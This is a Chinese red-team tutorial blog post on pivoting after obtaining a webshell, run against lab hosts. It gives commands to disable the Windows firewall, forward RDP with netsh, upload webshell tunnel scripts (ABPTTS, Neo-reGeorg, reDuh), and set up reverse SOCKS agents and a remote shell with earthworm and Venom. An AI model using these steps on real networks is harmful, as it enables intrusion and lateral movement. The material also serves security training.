内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

  • A+
所属分类:安全文章

渗透攻击红队

一个专注于红队攻击的公众号

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记


大家好,这里是 渗透攻击红队 的第 15 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),每天一更


内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记
内网穿透



什么时候会用到内网穿透?


在我们拿下一个Webshell的时候,我们没办法把一些工具上传到目标服务器上去使用,那样可能会有风险,而且有的时候还没有特定的环境来使用工具。这个时候我们就可以使用内网穿透来吧服务器的流量代理到本地,就相当于我们是在内网环境,我们就可以使用自己PC上的工具对内网进行扫描,内网渗透,域渗透等等。



内网穿透

netsh端口转发



netsh(Networ Shell)是一个Windows系统本身提供的功能强大的网络配置命令行工具。使用netsh进行端口转发的条件是必须是管理员(administrator)权限。




一:查看防火墙配置

netsh firewall show config

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

如果操作模式(Operational mode)是启用的,那么我们操作的时候需要吧防火墙给关闭才可以进行接下来的操作。

二、关闭防火墙

netsh advfirewall set allprofiles state off

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

这个时候防火墙(操作模式)就是关闭状态:

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

三、添加一个入站规则(给外网打开一个端口)

 一般来说网络边界DMZ区都有一个内网网卡和一个外网网卡。这个时候我们就要吧它的外网0.0.0.0:3389端口打开。

添加一个saul规则,走TCP协议,开一个10086端口netsh advfirewall firewall add rule name="saul" dir=in action=allow protocol=TCP localport=10086
通过IPv4吧本地127.0.0.1的内网3389端口转发到外网的10086端口netsh interface portproxy add v4tov4 listenport=10086 connectaddress=127.0.0.1 connectport=3389
查看防火墙状态netsh firewall show state
查看所有转发规则netsh interface portproxy show all-------------------------------------------------删除规则netsh advfirewall firewall delete rule name="saul" dir=in action=allow protocol=TCP localport=10086netsh interface portproxy delete v4tov4 listenport=10086

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

查看转发规则中,地址是 * 号说明任意地址都可以,如果是一个IP地址的话,那么说明只允许指定IP才可以连接。

这个时候我们只需要远程连接目标的10086端口就相当于连接了目标的3389端口:mstsc

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

额,连接错误不知道是为啥。(有知道的可以在读者讨论留言!)

但是我们可以使用这条命令:

netsh interface portproxy add v4tov4 listenport=10086 listenaddress=192.168.2.13 connectport=3389 connectaddress=192.168.2.13
listenaddress - 等待连接的本地IP地址。listenport - 本地侦听TCP端口。connectaddress - 将传入连接重定向到本地或远程IP地址(或DNS名称)。

connectport - 一个TCP端口,来自listenport的连接会被转发到该端口。假设当前我们的RDP服务端口在一个非标准端口上进行响应,如10086(端口可以在服务设置中更改)。为此,我们需要将传入流量从TCP端口10086重定向到另一个本地端口 - 3389(即标准rdp端口)。

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

使用mstsc进行远程连接:

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

删除规则:

删除指定的端口转发规则:netsh interface portproxy delete v4tov4 listenport=10086 listenaddress=192.168.2.13删除所有当前端口转发规则:netsh interface portproxy reset

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记




SSF正反向代理


反向代理

反向代理就是我们客户端监听,目标服务端连接我们的客户端。

PS:SSF走的是Socks5代理

SSF下载地址:https://securesocketfunneling.github.io/ssf/#download

一、服务端Win监听1111端口,等待连接:

Linux:./ssfd -p 1111Windows:ssfd.exe -p 1111

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

二、客户端网络边界DMZ连接我们服务端的1111端口,并将数据流量转发给2222端口:

Windows:ssf.exe -F 2222 -p 1111 192.168.2.7Linux:./ssf -F 2222 -p 1111  192.168.2.7

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

三、使用代理工具Proxychains做socks代理

下载安装:apt install proxychains

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

之后设置配置文件:proxychains.conf

vi /etc/proxychains.conf

在最后一行改成 2222 端口保存退出:

socks5 127.0.0.1 2222

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

之后如果想用自己的工具或者说是kali自带的工具,那么就可以在前面加上proxychains就可以了:

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

正向代理

如果目标防火墙只允许进不允许出,那么我们就可以使用正向代理。也就是我们去连接目标。

一、目标监听1080端口:

ssfd.exe -p 1080

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

二、服务端连接目标1080,并吧数据转发到1081:

.ssf -D 1081 -P 1080 192.168.2.4

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

三、使用Proxifier工具进行socks5代理连接:

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记




abptts正向端口转发


abptts是一款基于ssl加密的http隧道工具,相对来讲还算稳定。

PS:abptts不支持PHP

下载地址:https://github.com/nccgroup/ABPTTS.git

一、生成一个webshell

 python abpttsfactory.pyo webshell

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

出错的话那么安装python的一些模块就好了:

python ‐m pip install pycryptopython ‐m pip install pycryptodomepython ‐m pip install httplib2

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

 python abpttsfactory.pyo webshell

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

生成之后当前路径下会有一个webshell目录,结构是这样的:

webshell/├── abptts.aspx├── abptts.jsp├── config.txt├── GerbilFrame.war└── war    ├── GerbilFrame.jsp    ├── META-INF    │   └── MANIFEST.MF    └── WEB-INF        └── web.xml

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

然后我本地使用的是Jspstudy,然后吧生成的脚本abptts.jsp上传上去:

访问:http://192.168.2.13/abptts.jsp 会得到一串加密值:

7d75922bf227ec32477d3bb1f15b6047423a6d23dd449fe61b15dab5d5467f72f9010247.571e91

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

二、使用python进行连接

 命令格式: python abpttsclient.py ‐c webshell/config.txt ‐u "http://目标服务器/abptts.jsp" -f 本地内网IP:本地端口/目标边界内网IP:需要转发的目标边界端口  将目标边界的3389转发到本地的33389端口上:  python abpttsclient.py -c webshell/config.txt -u "http://192.168.2.13/abptts.jsp" -f 127.0.0.1:33389/127.0.0.1:3389

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

然后本地连接自己的127.0.0.1:33389就相当于连接192.168.2.13的3389端口:

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

远程桌面rdp连接成功!




earthworm正向跨平台socks代理


反向代理 

一、客户端攻击机吧外网的888端口转发到本地的1008端口:

./ew_for_linux64 -s rcsocks -l 1008 -e 888

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

二、目标边界接收888端口的数据:

ew_for_Win.exe -s rssocks -d 192.168.2.13 -e 888

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

连接上攻击机服务端会显示rssocks cmd_socket OK!

这个时候修改 proxychains.conf 的端口为1008:

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

之后如果想用自己的工具或者说是kali自带的工具,那么就可以在前面加上proxychains就可以了:

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

正向代理 

目标边界执行:

ew_for_Win.exe -s ssocksdl 1080

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

攻击机服务端修改proxychains文件:192.168.2.13是目标边界的IP

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

之后如果想用自己的工具或者说是kali自带的工具,那么就可以在前面加上proxychains就可以了:

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记




earthworm正向跨平台socks代理


下载地址:https://github.com/L-codes/Neo-reGeorg

一、生成webshell,密码是123456:

python neoreg.py generatek 123456

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记


吧 neoreg_servers文件夹下的tunnel.jsp 上传到目标服务器上:http://192.168.2.13/tunnel.php

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

二、攻击机客户端连接目标边界建立socks代理:

python neoreg.py -k 123456 -u http://192.168.2.13/tunnel.jsp

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

这个时候使用Proxifier进行socks5代理本地1080端口:

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记





reDuh正向端口转发


ReDuh 是一个通过 HTTP 协议建立隧道传输各种其他数据的工具。其可以把内网服务器的端口通过 http/https 隧道转发到本机,形成一个连通回路。用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口。

PS:这个工具卡的一笔!RDP连接随时会掉!

下载地址:https://github.com/sensepost/reDuh

一、吧服务端reDuh.jsp文件上传到目标服务器:http://192.168.2.13/reDuh.jsp

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

二、攻击机连接服务端:

在客户端的dist目录下执行:

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

目录:reDuhreDuhClientdistjava ‐jar reduhclient.jar http://192.168.2.13/reDuh.jsp

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

三、绑定端口建立一个隧道

可以使用telnet或者nc等等:

telnet 127.0.0.1 1010

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

四、吧目标的3389端口转发到本地的33389

命令语法: [createTunnel]要绑定到本地哪个端口上[33389]:127.0.0.1:要绑定远程机器上的哪个端口[3389,22]
[createTunnel]33389:127.0.0.1:3389

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

五、连接本地的33389进行远程桌面登陆

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记




venom反向socks代理


Venom是一款为渗透测试人员设计的使用Go开发的多级代理工具。

Venom可将多个节点进行连接,然后以节点为跳板,构建多级代理。

渗透测试人员可以使用Venom轻松地将网络流量代理到多层内网,并轻松地管理代理节点。


一、攻击机监听本地端口5555

admin.exe -lport 5555

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

二、目标边界反向连接我们服务端(192.168.2.13)

agent.exerhost 192.168.2.13rport 5555

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

连接成功服务端会显示success!

三、查看节点

show  

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

四:进入节点 1:

goto 1

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

五、进入交互式shell

shell

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

退出的话就使用:exit 命令:

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

六、建立socks代理

socks 9999

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

七、最后使用Proxifier对公网192.168.2.13进行socks代理连接

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记





参考文章:

https://blog.csdn.net/qq_18501087/article/details/89406614

https://www.freebuf.com/articles/system/176889.html

https://www.jianshu.com/p/baf750b09303

https://blog.csdn.net/jcfszxc/article/details/102966056

https://zhuanlan.zhihu.com/p/98526331

https://www.naraku.cn/posts/82.html

https://sensepost.com/research/reDuh/

https://blog.csdn.net/sudo0m/article/details/85198795

https://xz.aliyun.com/t/4058



内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

渗透攻击红队

一个专注于渗透红队攻击的公众号

内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记



内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记
点分享
内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记
点点赞
内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记
点在看

本文始发于微信公众号(渗透攻击红队):内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: